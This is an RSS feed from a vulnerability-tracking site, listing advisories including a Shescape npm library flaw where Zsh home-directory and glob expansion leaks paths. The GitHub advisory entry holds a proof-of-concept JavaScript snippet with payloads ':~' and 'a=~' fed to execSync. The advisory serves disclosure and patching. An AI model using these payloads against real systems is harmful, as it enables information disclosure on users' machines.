<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Tue, 06 Oct 2026 12:41:33 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-351892</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-351892</link>
      <description>EUVD-2026-351892</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-351892</guid>
    </item>
    <item>
      <title>fkie_cve-2026-73412</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-73412</link>
      <description>&lt;p&gt;Shescape is a simple shell escape library for JavaScript. Prior to 2.1.14 and 3.0.1, this impacts users of Shescape on Unix systems that explicitly configure shell to Zsh, or true when the default shell is Zsh, using the escape and escapeAll. The Zsh options EXTENDED_GLOB and MAGIC_EQUAL_SUBST exacerbate the problem. In certain case, an attacker can leverage home directory expansion and extended glob syntax to obtain lists of files and directories on the system. Depending on what the command does, this may be used to leak more information. This issue is fixed in versions 2.1.14 and 3.0.1.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Shescape is a simple shell escape library for JavaScript. Prior to 2.1.14 and 3.0.1, this impacts users of Shescape on Unix systems that explicitly configure shell to Zsh, or true when the default shell is Zsh, using the escape and escapeAll. The Zsh options EXTENDED_GLOB and MAGIC_EQUAL_SUBST exacerbate the problem. In certain case, an attacker can leverage home directory expansion and extended glob syntax to obtain lists of files and directories on the system. Depending on what the command does, this may be used to leak more information. This issue is fixed in versions 2.1.14 and 3.0.1.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-73412</guid>
    </item>
    <item>
      <title>GHSA-6v4m-fw66-8r4x — Shescape: Path disclosure on Unix with Zsh</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-6v4m-fw66-8r4x</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: shescape&lt;/p&gt;
&lt;p&gt;### Impact&lt;/p&gt;
&lt;p&gt;This impacts users of Shescape on Unix systems that explicitly configure `shell` to Zsh, or `true` when the default shell is Zsh, using the `escape` and `escapeAll`. The Zsh options `EXTENDED_GLOB` and `MAGIC_EQUAL_SUBST` exacerbate the problem.&lt;/p&gt;
&lt;p&gt;In certain case, an attacker can leverage home directory expansion and extended glob syntax to obtain lists of files and directories on the system. Depending on what the command does, this may be used to leak more information.&lt;/p&gt;
&lt;p&gt;#### Without option / with `MAGIC_EQUAL_SUBST`&lt;/p&gt;
&lt;p&gt;```javascript
import * as cp from &amp;#34;node:child_process&amp;#34;;
import { Shescape } from &amp;#34;shescape&amp;#34;;&lt;/p&gt;
&lt;p&gt;// 1. Prerequisites
const options = {
    shell: &amp;#34;zsh&amp;#34;,
    // Or
    shell: true, // Only if the default shell is Zsh
};&lt;/p&gt;
&lt;p&gt;// 2. Payload
const payload1 = &amp;#34;:~&amp;#34;;
// Or
const payload2 = &amp;#34;a=~&amp;#34;; // requires MAGIC_EQUAL_SUBST&lt;/p&gt;
&lt;p&gt;// 3. Usage
const shescape = new Shescape(options);
let escapedPayload;&lt;/p&gt;
&lt;p&gt;escapedPayload = shescape.escape(payload1);
// Or
escapedPayload = shescape.escapeAll([payload1]);
// And (example)
const result1 = cp.execSync(`V=${escapedPayload}; echo $V`, options);&lt;/p&gt;
&lt;p&gt;// Or
escapedPayload = shescape.escape(payload2);
// Or
escapedPayload = shescape.escapeAll([payload2]);
// And (example)
const result2 = cp.execSync(`echo ${escapedPayload}`, options);&lt;/p&gt;
&lt;p&gt;// 4. Impact
console.log(&amp;#34;&amp;#34;, result1.toString().trim(), &amp;#34;\n&amp;#34;, result2.toString().trim());
// Outputs &amp;#34;:&amp;#34; followed by the user&amp;#39;s home directory on one line and &amp;#34;a=&amp;#34;
// followed by the user&amp;#39;s home directo…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: shescape&lt;/p&gt;
&lt;p&gt;### Impact&lt;/p&gt;
&lt;p&gt;This impacts users of Shescape on Unix systems that explicitly configure `shell` to Zsh, or `true` when the default shell is Zsh, using the `escape` and `escapeAll`. The Zsh options `EXTENDED_GLOB` and `MAGIC_EQUAL_SUBST` exacerbate the problem.&lt;/p&gt;
&lt;p&gt;In certain case, an attacker can leverage home directory expansion and extended glob syntax to obtain lists of files and directories on the system. Depending on what the command does, this may be used to leak more information.&lt;/p&gt;
&lt;p&gt;#### Without option / with `MAGIC_EQUAL_SUBST`&lt;/p&gt;
&lt;p&gt;```javascript
import * as cp from &amp;#34;node:child_process&amp;#34;;
import { Shescape } from &amp;#34;shescape&amp;#34;;&lt;/p&gt;
&lt;p&gt;// 1. Prerequisites
const options = {
    shell: &amp;#34;zsh&amp;#34;,
    // Or
    shell: true, // Only if the default shell is Zsh
};&lt;/p&gt;
&lt;p&gt;// 2. Payload
const payload1 = &amp;#34;:~&amp;#34;;
// Or
const payload2 = &amp;#34;a=~&amp;#34;; // requires MAGIC_EQUAL_SUBST&lt;/p&gt;
&lt;p&gt;// 3. Usage
const shescape = new Shescape(options);
let escapedPayload;&lt;/p&gt;
&lt;p&gt;escapedPayload = shescape.escape(payload1);
// Or
escapedPayload = shescape.escapeAll([payload1]);
// And (example)
const result1 = cp.execSync(`V=${escapedPayload}; echo $V`, options);&lt;/p&gt;
&lt;p&gt;// Or
escapedPayload = shescape.escape(payload2);
// Or
escapedPayload = shescape.escapeAll([payload2]);
// And (example)
const result2 = cp.execSync(`echo ${escapedPayload}`, options);&lt;/p&gt;
&lt;p&gt;// 4. Impact
console.log(&amp;#34;&amp;#34;, result1.toString().trim(), &amp;#34;\n&amp;#34;, result2.toString().trim());
// Outputs &amp;#34;:&amp;#34; followed by the user&amp;#39;s home directory on one line and &amp;#34;a=&amp;#34;
// followed by the user&amp;#39;s home directo…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-6v4m-fw66-8r4x</guid>
    </item>
  </channel>
</rss>
